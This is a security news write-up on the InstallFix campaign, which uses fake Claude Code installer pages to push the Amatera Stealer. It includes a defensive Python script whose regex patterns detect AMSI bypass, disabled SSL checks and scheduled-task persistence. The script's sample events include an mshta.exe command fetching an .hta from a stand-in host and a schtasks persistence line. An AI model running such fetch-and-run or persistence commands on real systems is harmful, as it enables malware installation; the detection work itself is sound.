InstallFix campaign spreads malware through fake Claude AI installer pages
Updated · Trend Micro · May 5
Trend Micro said the Google Ads-linked campaign hit organisations in the US, Malaysia, Thailand and the Netherlands across government, education, electronics, and food and beverage sectors.
Victims are lured into running PowerShell commands that invoke mshta.exe, disable SSL checks, bypass AMSI, create scheduled tasks for persistence and contact attacker-controlled servers for further payloads.
The report says the operation targets users searching for Claude Code, using realistic OS-specific install instructions and fileless, victim-unique command-and-control URLs that hinder detection and remediation.
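As an added illustration, not code from the Trend Micro report, the behaviour chain summarised above (PowerShell spawning mshta.exe, SSL checks disabled, AMSI tampering, scheduled-task persistence) can be turned into a host-level triage rule over process-creation telemetry. The event schema, host names, paths and command lines below are constructed assumptions, not real telemetry or indicators.

```python
"""Heuristic triage of process-creation events for the InstallFix chain.
Added example; assumes a simplified Sysmon/EDR-style record per process."""
import re
from collections import defaultdict

# One pattern per step of the chain described in the report (besides mshta).
PATTERNS = {
    "ssl_checks_disabled": re.compile(
        r"ServerCertificateValidationCallback|-SkipCertificateCheck", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I),
    "scheduled_task_persistence": re.compile(
        r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I),
}

def classify(event):
    """Return the set of indicator names a single event matches."""
    hits = set()
    image, parent = event["image"].lower(), event["parent_image"].lower()
    # mshta.exe is legitimate on its own; require PowerShell as the parent,
    # which is how the lure's copy-pasted command launches it.
    if image.endswith("mshta.exe") and parent.endswith("powershell.exe"):
        hits.add("powershell_spawns_mshta")
    for name, pattern in PATTERNS.items():
        if pattern.search(event["command_line"]):
            hits.add(name)
    return hits

def triage(events):
    """Aggregate hits per host; 3+ distinct chain steps on one host is high."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    return {h: {"indicators": sorted(s), "severity": "high" if len(s) >= 3 else "low"}
            for h, s in per_host.items() if s}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not real indicators
    {"host": "ws-01", "parent_image": PS, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://installer.example.invalid/setup.hta"},
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -w hidden -c <constructed: sets "
                     "ServerCertificateValidationCallback, references AmsiUtils>"},
    {"host": "ws-01", "parent_image": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": 'schtasks.exe /create /tn "ClaudeUpdate" /sc onlogon /tr "<constructed>"'},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe Get-Process"},
    {"host": "ws-02", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe", "command_line": "schtasks.exe /query"},
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Only ws-01 is reported; the benign ws-02 activity (interactive PowerShell, `schtasks /query`) produces no hits because the rule keys on the parent/child relationship and the `/create` verb rather than on the binaries alone.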
InstallFix Exposed: The 2026 Amatera Stealer Epidemic Targeting AI Users via Trusted Infrastructure
Overview
As of May 2026, the InstallFix malware campaign is a major global threat, using advanced tactics to compromise users. Attackers create fake installer pages for popular AI tools like Anthropic’s Claude Code, tricking people into downloading the Amatera Stealer malware. These malicious sites are hosted on trusted platforms such as Cloudflare Pages and Squarespace, helping attackers bypass security systems that rely on domain reputation. This makes the attacks hard to detect and stop, allowing InstallFix to spread widely and steal sensitive information from unsuspecting users around the world.